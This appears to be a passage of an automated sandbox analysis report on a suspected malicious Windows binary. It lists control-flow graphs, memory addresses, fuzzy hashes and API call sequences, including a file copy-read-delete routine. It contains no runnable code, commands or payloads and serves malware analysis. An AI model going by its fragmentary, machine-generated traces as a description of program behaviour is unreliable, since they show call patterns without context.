                                                                                      • Instruction ID: 2f2a0876ab52d0c3b5fd85e8b6b8102068b78f5e680aad2f4c3990b18bef44a1
                                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                      • Instruction Fuzzy Hash: 09610975D00218BFEF11CBA8C848BDEB7B6AF25318F804456D394A7252EB786A45CF52

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen
                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                      • API String ID: 4218353326-230879103
                                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                      • Instruction ID: 9ad6e69c0a26cd37e0c5facc861a83a1d51aecaaa2cced19a7a5aa9f415acf4e
                                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                      • Instruction Fuzzy Hash: 1E7117B1D002287BDB119FB89888ADF7BFD9F29258F104096D748D7241E678D789CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 276 37867cc2-37867cd6 277 37867d44-37867d4c 276->277 278 37867cd8-37867cdd 276->278 280 37867d93-37867dab call 37867e35 277->280 281 37867d4e-37867d51 277->281 278->277 279 37867cdf-37867ce4 278->279 279->277 282 37867ce6-37867ce9 279->282 290 37867dae-37867db5 280->290 281->280 284 37867d53-37867d90 call 3786571e * 4 281->284 282->277 285 37867ceb-37867cf3 282->285 284->280 288 37867cf5-37867cf8 285->288 289 37867d0d-37867d15 285->289 288->289 292 37867cfa-37867d0c call 3786571e call 378690ba 288->292 295 37867d17-37867d1a 289->295 296 37867d2f-37867d43 call 3786571e * 2 289->296 293 37867db7-37867dbb 290->293 294 37867dd4-37867dd8 290->294 292->289 302 37867dd1 293->302 303 37867dbd-37867dc0 293->303 298 37867df0-37867dfc 294->298 299 37867dda-37867ddf 294->299 295->296 304 37867d1c-37867d2e call 3786571e call 378691b8 295->304 296->277 298->290 311 37867dfe-37867e0b call 3786571e 298->311 308 37867de1-37867de4 299->308 309 37867ded 299->309 302->294 303->302 313 37867dc2-37867dd0 call 3786571e * 2 303->313 304->296 308->309 316 37867de6-37867dec call 3786571e 308->316 309->298 313->302 316->309
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 37867D06
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 378690D7
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 378690E9
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 378690FB
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 3786910D
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 3786911F
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 37869131
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 37869143
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 37869155
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 37869167
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 37869179
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 3786918B
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 3786919D
                                                                                        • Part of subcall function 378690BA: _free.LIBCMT ref: 378691AF
                                                                                      • _free.LIBCMT ref: 37867CFB
                                                                                        • Part of subcall function 3786571E: HeapFree.KERNEL32(00000000,00000000,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?), ref: 37865734
                                                                                        • Part of subcall function 3786571E: GetLastError.KERNEL32(?,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?,?), ref: 37865746
                                                                                      • _free.LIBCMT ref: 37867D1D
                                                                                      • _free.LIBCMT ref: 37867D32
                                                                                      • _free.LIBCMT ref: 37867D3D
                                                                                      • _free.LIBCMT ref: 37867D5F
                                                                                      • _free.LIBCMT ref: 37867D72
                                                                                      • _free.LIBCMT ref: 37867D80
                                                                                      • _free.LIBCMT ref: 37867D8B
                                                                                      • _free.LIBCMT ref: 37867DC3
                                                                                      • _free.LIBCMT ref: 37867DCA
                                                                                      • _free.LIBCMT ref: 37867DE7
                                                                                      • _free.LIBCMT ref: 37867DFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: 2a3fe252f40c05a26e5cd9a53b9a179eb3bce8ca7b0ff820d9debc7015172f4a
                                                                                      • Instruction ID: 144a52d5b401f0d9e2558a9ef853b3ed8d50f6fa84819671ef253727f2ed6ab5
                                                                                      • Opcode Fuzzy Hash: 2a3fe252f40c05a26e5cd9a53b9a179eb3bce8ca7b0ff820d9debc7015172f4a
                                                                                      • Instruction Fuzzy Hash: E5319075500209FFEB219E38D84CB6677E9EF20368F24482DEB68C7554DF39A980CB51

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 378659EA
                                                                                        • Part of subcall function 3786571E: HeapFree.KERNEL32(00000000,00000000,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?), ref: 37865734
                                                                                        • Part of subcall function 3786571E: GetLastError.KERNEL32(?,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?,?), ref: 37865746
                                                                                      • _free.LIBCMT ref: 378659F6
                                                                                      • _free.LIBCMT ref: 37865A01
                                                                                      • _free.LIBCMT ref: 37865A0C
                                                                                      • _free.LIBCMT ref: 37865A17
                                                                                      • _free.LIBCMT ref: 37865A22
                                                                                      • _free.LIBCMT ref: 37865A2D
                                                                                      • _free.LIBCMT ref: 37865A38
                                                                                      • _free.LIBCMT ref: 37865A43
                                                                                      • _free.LIBCMT ref: 37865A51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 9c031c2511cc687b07659501f5d04f4d80a3cac3efba6cd4fc4b4c270e122630
                                                                                      • Instruction ID: b3e52cc6f61e99ff882997a73289121c34c63fc9ae1cf7bdee1d68c1b75eea40
                                                                                      • Opcode Fuzzy Hash: 9c031c2511cc687b07659501f5d04f4d80a3cac3efba6cd4fc4b4c270e122630
                                                                                      • Instruction Fuzzy Hash: 1111E67A12114DFFCB21DF58C844CDD3FA5EF14254B0940A1BA188FA21DB35EB509F82

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 360 3786aa53-3786aa6e 361 3786aa80 360->361 362 3786aa70-3786aa7e RtlDecodePointer 360->362 363 3786aa85-3786aa8b 361->363 362->363 364 3786abb2-3786abb5 363->364 365 3786aa91 363->365 368 3786abb7-3786abba 364->368 369 3786ac12 364->369 366 3786aba6 365->366 367 3786aa97-3786aa9a 365->367 370 3786aba8-3786abad 366->370 371 3786ab47-3786ab4a 367->371 372 3786aaa0 367->372 374 3786ac06 368->374 375 3786abbc-3786abbf 368->375 373 3786ac19 369->373 376 3786ac5b-3786ac6a call 37862ada 370->376 382 3786ab4c-3786ab4f 371->382 383 3786ab9d-3786aba4 371->383 377 3786aaa6-3786aaab 372->377 378 3786ab34-3786ab42 372->378 379 3786ac20-3786ac49 373->379 374->369 380 3786abc1-3786abc4 375->380 381 3786abfa 375->381 385 3786ab25-3786ab2f 377->385 386 3786aaad-3786aab0 377->386 378->379 407 3786ac56-3786ac59 379->407 408 3786ac4b-3786ac50 call 37866368 379->408 387 3786abc6-3786abc9 380->387 388 3786abee 380->388 381->374 389 3786ab94-3786ab9b 382->389 390 3786ab51-3786ab54 382->390 384 3786ab61-3786ab8f 383->384 384->407 385->379 392 3786aab2-3786aab5 386->392 393 3786ab1c-3786ab23 386->393 395 3786abe2 387->395 396 3786abcb-3786abd0 387->396 388->381 389->373 390->376 397 3786ab5a 390->397 400 3786aab7-3786aaba 392->400 401 3786ab0d-3786ab17 392->401 399 3786aac7-3786aaf7 393->399 395->388 402 3786abd2-3786abd5 396->402 403 3786abdb-3786abe0 396->403 397->384 399->407 414 3786aafd-3786ab08 call 37866368 399->414 400->376 405 3786aac0 400->405 401->379 402->376 402->403 403->370 405->399 407->376 408->407 414->407
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: DecodePointer
                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                      • API String ID: 3527080286-3064271455
                                                                                      • Opcode ID: 867fcaaf651f0d26def6eb7f5404779845904309e247878cae394d3011f1a175
                                                                                      • Instruction ID: dfa609a51b3788579aa26254084ac67055bf70796a21530c8ea1a2c21ca315cf
                                                                                      • Opcode Fuzzy Hash: 867fcaaf651f0d26def6eb7f5404779845904309e247878cae394d3011f1a175
                                                                                      • Instruction Fuzzy Hash: 215190B4A0064DEFDF00CF64E58C6ECBF70FF69228F514585D681BA654CB359924CB26

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D1B
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37861D37
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D4B
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D58
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D72
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D7D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                      • String ID:
                                                                                      • API String ID: 1454806937-0
                                                                                      • Opcode ID: 4ac49b24b5463382dbe352e6bb10fdced46fdfd5ff44dcf2e5af6b49f823f710
                                                                                      • Instruction ID: 7b098a9f4ec9f96c718ef002f51fd62cb227bb3a975bb64b82c429f7495e3d0e
                                                                                      • Opcode Fuzzy Hash: 4ac49b24b5463382dbe352e6bb10fdced46fdfd5ff44dcf2e5af6b49f823f710
                                                                                      • Instruction Fuzzy Hash: 602131B1D4121CBFEB10ABA48C8DFEB7AACEB18358F0005A5F715F2140D6789E468B71

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 434 37869492-378694ef GetConsoleCP 435 378694f5-37869511 434->435 436 37869632-37869644 call 37862ada 434->436 437 37869513-3786952a 435->437 438 3786952c-3786953d call 37867c19 435->438 440 37869566-37869575 call 378679e6 437->440 445 37869563-37869565 438->445 446 3786953f-37869542 438->446 440->436 450 3786957b-3786959b WideCharToMultiByte 440->450 445->440 448 37869548-3786955a call 378679e6 446->448 449 37869609-37869628 446->449 448->436 457 37869560-37869561 448->457 449->436 450->436 452 378695a1-378695b7 WriteFile 450->452 454 3786962a-37869630 GetLastError 452->454 455 378695b9-378695ca 452->455 454->436 455->436 456 378695cc-378695d0 455->456 458 378695d2-378695f0 WriteFile 456->458 459 378695fe-37869601 456->459 457->450 458->454 460 378695f2-378695f6 458->460 459->435 461 37869607 459->461 460->436 462 378695f8-378695fb 460->462 461->436 462->459
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,37869C07,?,00000000,?,00000000,00000000), ref: 378694D4
                                                                                      • __fassign.LIBCMT ref: 3786954F
                                                                                      • __fassign.LIBCMT ref: 3786956A
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 37869590
                                                                                      • WriteFile.KERNEL32(?,?,00000000,37869C07,00000000,?,?,?,?,?,?,?,?,?,37869C07,?), ref: 378695AF
                                                                                      • WriteFile.KERNEL32(?,?,?,37869C07,00000000,?,?,?,?,?,?,?,?,?,37869C07,?), ref: 378695E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: 141547fca9d1433d1c46719eb8ef3006d1f9b864b7083fddd5a7f870b959a78e
                                                                                      • Instruction ID: 1c030a29ad8c1c0f23799e3c95a273637ac7319a4cd026f01ec525f939f8d099
                                                                                      • Opcode Fuzzy Hash: 141547fca9d1433d1c46719eb8ef3006d1f9b864b7083fddd5a7f870b959a78e
                                                                                      • Instruction Fuzzy Hash: B351A6B1900249AFDB00CFA4C899BEEFBF4EF19314F14415EE655F7281D674A942CB61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 463 37863370-378633b5 call 37863330 call 378637a7 468 37863416-37863419 463->468 469 378633b7-378633c9 463->469 470 3786341b-37863428 call 37863790 468->470 471 37863439-37863442 468->471 469->471 472 378633cb 469->472 475 3786342d-37863436 call 37863330 470->475 474 378633d0-378633e7 472->474 476 378633fd 474->476 477 378633e9-378633f7 call 37863740 474->477 475->471 480 37863400-37863405 476->480 485 3786340d-37863414 477->485 486 378633f9 477->486 480->474 483 37863407-37863409 480->483 483->471 484 3786340b 483->484 484->475 485->475 487 37863443-3786344c 486->487 488 378633fb 486->488 489 37863486-37863496 call 37863774 487->489 490 3786344e-37863455 487->490 488->480 495 378634aa-378634c6 call 37863330 call 37863758 489->495 496 37863498-378634a7 call 37863790 489->496 490->489 492 37863457-37863466 call 3786bbe0 490->492 500 37863483 492->500 501 37863468-37863480 492->501 496->495 500->489 501->500
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 3786339B
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 378633A3
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 37863431
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 3786345C
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 378634B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: 840f64823de37b52bf24769fac5a7485428583103ea30ddcc0609641e5205fd2
                                                                                      • Instruction ID: 8ab22a55fd45247b552b579716ca168aae3870f68ca99ba5128823a96e82bf50
                                                                                      • Opcode Fuzzy Hash: 840f64823de37b52bf24769fac5a7485428583103ea30ddcc0609641e5205fd2
                                                                                      • Instruction Fuzzy Hash: AD41C674A00248BBCF01CF68CC48A9EBBB5AF6932CF108165DA15AB751DB35EA05CF91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 37869221: _free.LIBCMT ref: 3786924A
                                                                                      • _free.LIBCMT ref: 378692AB
                                                                                        • Part of subcall function 3786571E: HeapFree.KERNEL32(00000000,00000000,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?), ref: 37865734
                                                                                        • Part of subcall function 3786571E: GetLastError.KERNEL32(?,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?,?), ref: 37865746
                                                                                      • _free.LIBCMT ref: 378692B6
                                                                                      • _free.LIBCMT ref: 378692C1
                                                                                      • _free.LIBCMT ref: 37869315
                                                                                      • _free.LIBCMT ref: 37869320
                                                                                      • _free.LIBCMT ref: 3786932B
                                                                                      • _free.LIBCMT ref: 37869336
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                      • Instruction ID: f1507f73237c3cee50079b227e2c238648323af618c74b5362c4379d3cb9816f
                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                      • Instruction Fuzzy Hash: 31118171541B08FAD630ABB4DC4EFCBBB9E9F14708F400828A7B976192DB2AB5454F52
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,37866FFD,00000000,?,?,?,37868A72,?,?,00000100), ref: 3786887B
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,37868A72,?,?,00000100,5EFC4D8B,?,?), ref: 37868901
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 378689FB
                                                                                      • __freea.LIBCMT ref: 37868A08
                                                                                        • Part of subcall function 378656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37865702
                                                                                      • __freea.LIBCMT ref: 37868A11
                                                                                      • __freea.LIBCMT ref: 37868A36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: 111d8c427e1d868c8dd16b323843dc52bc45c01982cacf10f67fb0be4dc27346
                                                                                      • Instruction ID: 34fdc8aa76690e4ab5b262684405b1b7fdab065130bc93b06903507e4c23f820
                                                                                      • Opcode Fuzzy Hash: 111d8c427e1d868c8dd16b323843dc52bc45c01982cacf10f67fb0be4dc27346
                                                                                      • Instruction Fuzzy Hash: 01510C72610216BFEB154E65CC49FBB37A9EF6476CF104A28FE18D6140EB34EC50EA52
                                                                                      APIs
                                                                                      • _strlen.LIBCMT ref: 37861607
                                                                                      • _strcat.LIBCMT ref: 3786161D
                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3786190E,?,?,00000000,?,00000000), ref: 37861643
                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,3786190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3786165A
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,3786190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 37861661
                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3786190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 37861686
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                      • String ID:
                                                                                      • API String ID: 1922816806-0
                                                                                      • Opcode ID: dcffdf3af3f30c0960feebcd855c124c812af5b6c98a76d470847183b9a318a8
                                                                                      • Instruction ID: dd87ba736d6e2fec1f3e256d855142cf2c010bdbf1a8b5732627b25f95c8bb2a
                                                                                      • Opcode Fuzzy Hash: dcffdf3af3f30c0960feebcd855c124c812af5b6c98a76d470847183b9a318a8
                                                                                      • Instruction Fuzzy Hash: EA21CB36900204BBDB049F58DC85EEE77B8EF98724F14441AE704BB141DB38A6458B66
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 37861038
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3786104B
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 37861061
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 37861075
                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 37861090
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 378610B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3594823470-0
                                                                                      • Opcode ID: e8376da78ca8e46518fb424262dbc2ddf900f497c2add03e1fdbd23c1b148d50
                                                                                      • Instruction ID: 2c3d4e773715e53cd51d099b2848a79b5eb50f98ca740e11627231a5ae444c91
                                                                                      • Opcode Fuzzy Hash: e8376da78ca8e46518fb424262dbc2ddf900f497c2add03e1fdbd23c1b148d50
                                                                                      • Instruction Fuzzy Hash: E7217475D00318BBCF50EE64DC4CEDB3768EF94328F104156EAA5A71A2DE349A85CF52
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,37863518,378623F1,37861F17), ref: 37863864
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 37863872
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 3786388B
                                                                                      • SetLastError.KERNEL32(00000000,?,37863518,378623F1,37861F17), ref: 378638DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 490a7697372ac95699d6be7734287759ecbffc264544fea9644508c4a74ab06c
                                                                                      • Instruction ID: a7efc074170687e37926b30ba60e68f80da460aece292903d964d4a23a3c32bf
                                                                                      • Opcode Fuzzy Hash: 490a7697372ac95699d6be7734287759ecbffc264544fea9644508c4a74ab06c
                                                                                      • Instruction Fuzzy Hash: 2101F7366497557EF6001A7E6C8EB962F54EB7EB7DB200239E320B9CD0EF1948428753
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,37866C6C), ref: 37865AFA
                                                                                      • _free.LIBCMT ref: 37865B2D
                                                                                      • _free.LIBCMT ref: 37865B55
                                                                                      • SetLastError.KERNEL32(00000000,?,?,37866C6C), ref: 37865B62
                                                                                      • SetLastError.KERNEL32(00000000,?,?,37866C6C), ref: 37865B6E
                                                                                      • _abort.LIBCMT ref: 37865B74
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 2dbb61c982a2d106b835ca3d03231fa53adceca09a997c109509315eab41fa3e
                                                                                      • Instruction ID: cf75baab6aa1d7fee5da6e87ca5785114ee937917cfef58c6f8402923b67e349
                                                                                      • Opcode Fuzzy Hash: 2dbb61c982a2d106b835ca3d03231fa53adceca09a997c109509315eab41fa3e
                                                                                      • Instruction Fuzzy Hash: 5EF0C87A546641BAD7022A386C0DF1E2F298FF657DF240124FB25B6180FF2C84034577
                                                                                      APIs
                                                                                        • Part of subcall function 37861E89: lstrlenW.KERNEL32(?,?,?,?,?,378610DF,?,?,?,00000000), ref: 37861E9A
                                                                                        • Part of subcall function 37861E89: lstrcatW.KERNEL32(?,?,?,378610DF,?,?,?,00000000), ref: 37861EAC
                                                                                        • Part of subcall function 37861E89: lstrlenW.KERNEL32(?,?,378610DF,?,?,?,00000000), ref: 37861EB3
                                                                                        • Part of subcall function 37861E89: lstrlenW.KERNEL32(?,?,378610DF,?,?,?,00000000), ref: 37861EC8
